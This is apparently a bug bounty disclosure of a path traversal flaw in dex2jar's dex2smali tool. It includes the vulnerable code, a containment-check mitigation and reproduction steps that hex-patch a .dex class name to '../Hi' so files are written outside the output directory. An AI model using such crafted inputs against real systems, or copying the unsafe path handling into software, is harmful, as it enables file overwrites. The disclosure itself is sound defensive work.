Relative Path Traversal in thexxturboxx/dex2jar

Valid

Reported on

Feb 14th 2022


Description

This vulnerability was originally reported to pxb1988/dex2jar and is being re-sent to the maintained fork repository as requested.
dex2jar is a set of tools for working with Android .dex and Java .class files.
One of these tools, "dex2smali", allows a malicious .dex file to overwrite arbitrary .smali files on the system.

In com.googlecode.d2j.smali.BaksmaliDexFileVisitor of d2j-smali, the following code determines the output location of each .smali file:

    Path smaliFile = dir
            .resolve(rebuildFileName(className.substring(1, className.length() - 1)) + ".smali");

Because rebuildFileName does not escape / or . sequences, a class name such as ../Hi resolves to a path outside the output directory, so arbitrary .smali files can be written there.

    protected String rebuildFileName(String s) {
        s = BaksmaliDumper.escapeId(s);
        // Only backslashes are rewritten; '/' and '.' pass through unchanged,
        // so "../Hi" survives and is later passed to dir.resolve().
        s = s.replace('\\', '-');
        String low = s.toLowerCase();
        if (hases.contains(low)) {
            // de-duplicate case-insensitive collisions with a numeric suffix
            return s + "_d2j" + i++;
        } else {
            hases.add(low);
        }
        return s;
    }
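The following is an added example, not code from dex2jar or from the report: it reproduces the path computation described above with the report's own descriptors (La/Dup; and L../Hi;), and places a containment check next to it that rejects any result escaping the output directory. The hardened form is one reasonable mitigation assumed here, not the project's actual patch; the class and method names are hypothetical.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Added example (not dex2jar's code). Shows why the resolve() call in the
 * report escapes the output directory, and a containment check that stops it.
 */
public class SmaliPathCheck {

    // Mirrors the report's vulnerable computation: the descriptor is stripped
    // of its leading 'L' and trailing ';' and resolved as-is, so nothing
    // removes "/" or "..".
    static Path unsafeSmaliPath(Path outDir, String classDescriptor) {
        String inner = classDescriptor.substring(1, classDescriptor.length() - 1);
        return outDir.resolve(inner + ".smali");
    }

    // Hardened form (assumption: one reasonable fix, not the project's patch):
    // normalize the resolved path and require it to remain under outDir.
    // Path.startsWith compares whole name components, so a sibling directory
    // such as "i200-out2" does not pass as a prefix of "i200-out".
    static Path safeSmaliPath(Path outDir, String classDescriptor) {
        Path base = outDir.toAbsolutePath().normalize();
        Path target = unsafeSmaliPath(base, classDescriptor).normalize();
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException(
                    "class descriptor escapes output directory: " + classDescriptor);
        }
        return target;
    }

    public static void main(String[] args) {
        Path out = Paths.get("i200-out");
        // Descriptors taken from the report's reproduction steps.
        String benign = "La/Dup;";
        String traversal = "L../Hi;";

        System.out.println(unsafeSmaliPath(out, benign));    // i200-out/a/Dup.smali
        System.out.println(unsafeSmaliPath(out, traversal)); // i200-out/../Hi.smali
        System.out.println(safeSmaliPath(out, benign));      // <cwd>/i200-out/a/Dup.smali
        try {
            safeSmaliPath(out, traversal);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The check is applied to the fully resolved and normalized path rather than to the class name string, so it catches any encoding of the traversal that the file system would honour, not only the literal "../" shown in the report.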

Steps to reproduce

Patch based method:
1. Download dex2jar and extract it: https://github.com/pxb1988/dex2jar/releases/tag/v2.1
2. Download i200.dex from here: https://github.com/pxb1988/dex2jar/blob/d7a86110baba3f845973017021fb10664b1b90d2/dex-reader/src/test/resources/i200.dex
3. Install the xxd and patch commands if they are not already on your machine.
4. Run xxd i200.dex > i200.txt.
5. Save the following file as diff.patch:

33c33
< 00000200: 0141 0001 4200 074c 612f 4475 703b 0015  .A..B..La/Dup;..
---
> 00000200: 0141 0001 4200 074c 2e2e 2f48 693b 0015  .A..B..L../Hi;..

6. Run patch i200.txt diff.patch.
7. Run xxd -r i200.txt i200-edited.dex.
8. Run d2j-dex2smali.sh i200-edited.dex.
9. Hi.smali will be written outside the i200-edited-out directory.

Binary editor method:
1. Download dex2jar and extract it: https://github.com/pxb1988/dex2jar/releases/tag/v2.1
2. Download i200.dex from here: https://github.com/pxb1988/dex2jar/blob/d7a86110baba3f845973017021fb10664b1b90d2/dex-reader/src/test/resources/i200.dex
3. Open it with a binary editor.
4. Replace a/Dup with ../Hi.
5. Save it.
6. Run d2j-dex2smali.sh i200.dex.
7. Hi.smali will be written outside the i200-out directory.

Impact

A crafted .dex file can overwrite arbitrary .smali files outside the output directory.

We are processing your report and will contact the thexxturboxx/dex2jar team within 24 hours. (a year ago)
Nico Mexis validated this vulnerability (a year ago)
RyotaK has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nico Mexis marked this as fixed in v45 with commit d064c1 (a year ago)
Nico Mexis has been awarded the fix bounty
This vulnerability will not receive a CVE

Jamie Slome (Admin), a year ago:

Nice work @ry0tak!